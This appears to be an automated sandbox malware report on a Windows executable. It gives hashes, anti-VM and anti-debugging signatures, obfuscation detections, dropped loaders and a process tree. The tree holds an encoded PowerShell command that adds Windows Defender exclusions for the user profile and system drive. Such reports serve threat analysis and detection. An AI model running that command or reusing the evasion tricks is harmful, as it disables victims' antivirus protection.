Analysis
-
max time kernel
117s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
15/07/2023, 22:08
Behavioral task
behavioral1
Sample
protmepls_BUT_BETTER_.exe
Resource
win7-20230712-en
General
-
Target
protmepls_BUT_BETTER_.exe
-
Size
15.7MB
-
MD5
3b175c33f73bcf59abb1b2b50fed49de
-
SHA1
13145dc1dfa3e6e6f1b762f8a016c298d3de744b
-
SHA256
dcfbfc44d17764159537d568afbe19e7bd981f08888c1e9fce9024a993858c28
-
SHA512
c3f59ef7f099c06e7d5bb45b72e8f206153c0e45b487eb8b6b801542bf6845aa5ee54c1e4800801e503c477cc7068593a95cc37cd410dd8e021cbf948ba83deb
-
SSDEEP
393216:5kLHj6tecPWNYP/VaMHAojfY4L4wAqvHV1opGH3u7n0dFsg0QQe+GrJG7bmxbo6:5ej6tenu/Pgojw8iqfTopL7yFaVe+GkW
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ protmepls_BUT_BETTER_.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion protmepls_BUT_BETTER_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion protmepls_BUT_BETTER_.exe -
Executes dropped EXE 3 IoCs
pid Process 2108 protmepls.exe 836 OMM Loader.exe 1256 Process not Found -
Loads dropped DLL 3 IoCs
pid Process 924 protmepls_BUT_BETTER_.exe 2108 protmepls.exe 1256 Process not Found -
Obfuscated with Agile.Net obfuscator 3 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/files/0x0007000000012107-63.dat agile_net behavioral1/files/0x0007000000012107-59.dat agile_net behavioral1/files/0x0007000000012107-64.dat agile_net -
resource yara_rule behavioral1/memory/924-54-0x0000000000400000-0x0000000001F4A000-memory.dmp themida behavioral1/memory/924-56-0x0000000000400000-0x0000000001F4A000-memory.dmp themida behavioral1/memory/924-62-0x0000000000400000-0x0000000001F4A000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA protmepls_BUT_BETTER_.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 924 protmepls_BUT_BETTER_.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1500 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1500 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 924 wrote to memory of 1500 924 protmepls_BUT_BETTER_.exe 28 PID 924 wrote to memory of 1500 924 protmepls_BUT_BETTER_.exe 28 PID 924 wrote to memory of 1500 924 protmepls_BUT_BETTER_.exe 28 PID 924 wrote to memory of 1500 924 protmepls_BUT_BETTER_.exe 28 PID 924 wrote to memory of 2108 924 protmepls_BUT_BETTER_.exe 30 PID 924 wrote to memory of 2108 924 protmepls_BUT_BETTER_.exe 30 PID 924 wrote to memory of 2108 924 protmepls_BUT_BETTER_.exe 30 PID 924 wrote to memory of 2108 924 protmepls_BUT_BETTER_.exe 30 PID 2108 wrote to memory of 836 2108 protmepls.exe 33 PID 2108 wrote to memory of 836 2108 protmepls.exe 33 PID 2108 wrote to memory of 836 2108 protmepls.exe 33 PID 2108 wrote to memory of 836 2108 protmepls.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\protmepls_BUT_BETTER_.exe"C:\Users\Admin\AppData\Local\Temp\protmepls_BUT_BETTER_.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:924 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAbQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AdwBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdQBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAaABxACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
C:\Users\Admin\protmepls.exe"C:\Users\Admin\protmepls.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Users\Admin\AppData\Local\Temp\protmepls_1a292930-93cd-4359-8cae-971b56d16345\OMM Loader.exe"C:\Users\Admin\AppData\Local\Temp\protmepls_1a292930-93cd-4359-8cae-971b56d16345\OMM Loader.exe"3⤵
- Executes dropped EXE
PID:836
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144KB
MD54b07d4daa90e051ca065e497c8d21346
SHA1248cce5809f7dbde17402ecb36bced1b071f9972
SHA25670795c1cda206491cafa049ad16bb7def36c08462e9133e7cea2ed55f1e61848
SHA5120c765fd2d67fe215942b838acd27f23298645eed56acc73dce75f721501f5fa8b89e37a3303b6ce2a6a1f111885e8d28a280cfb985d1b6521698a7bb77622545
-
Filesize
21.3MB
MD51bc9df12a338938019d8a42237566b5f
SHA14a1139848239d0fab1a07d2e328dc3732b92bdab
SHA256f8759733e825b911c48356f73a1c4fe1b703ecad786a773a8963c4eeff4afc94
SHA512506b56b43d271f38eba4612f8310ee1ec2ccb413e105a4cd493165aa975e0431900eef0be0eaa25d01081b9ce8117121e08ebdd0cde47178a7560afd6161e465
-
Filesize
21.3MB
MD51bc9df12a338938019d8a42237566b5f
SHA14a1139848239d0fab1a07d2e328dc3732b92bdab
SHA256f8759733e825b911c48356f73a1c4fe1b703ecad786a773a8963c4eeff4afc94
SHA512506b56b43d271f38eba4612f8310ee1ec2ccb413e105a4cd493165aa975e0431900eef0be0eaa25d01081b9ce8117121e08ebdd0cde47178a7560afd6161e465
-
Filesize
144KB
MD54b07d4daa90e051ca065e497c8d21346
SHA1248cce5809f7dbde17402ecb36bced1b071f9972
SHA25670795c1cda206491cafa049ad16bb7def36c08462e9133e7cea2ed55f1e61848
SHA5120c765fd2d67fe215942b838acd27f23298645eed56acc73dce75f721501f5fa8b89e37a3303b6ce2a6a1f111885e8d28a280cfb985d1b6521698a7bb77622545
-
Filesize
144KB
MD54b07d4daa90e051ca065e497c8d21346
SHA1248cce5809f7dbde17402ecb36bced1b071f9972
SHA25670795c1cda206491cafa049ad16bb7def36c08462e9133e7cea2ed55f1e61848
SHA5120c765fd2d67fe215942b838acd27f23298645eed56acc73dce75f721501f5fa8b89e37a3303b6ce2a6a1f111885e8d28a280cfb985d1b6521698a7bb77622545
-
Filesize
144KB
MD54b07d4daa90e051ca065e497c8d21346
SHA1248cce5809f7dbde17402ecb36bced1b071f9972
SHA25670795c1cda206491cafa049ad16bb7def36c08462e9133e7cea2ed55f1e61848
SHA5120c765fd2d67fe215942b838acd27f23298645eed56acc73dce75f721501f5fa8b89e37a3303b6ce2a6a1f111885e8d28a280cfb985d1b6521698a7bb77622545
-
Filesize
21.3MB
MD51bc9df12a338938019d8a42237566b5f
SHA14a1139848239d0fab1a07d2e328dc3732b92bdab
SHA256f8759733e825b911c48356f73a1c4fe1b703ecad786a773a8963c4eeff4afc94
SHA512506b56b43d271f38eba4612f8310ee1ec2ccb413e105a4cd493165aa975e0431900eef0be0eaa25d01081b9ce8117121e08ebdd0cde47178a7560afd6161e465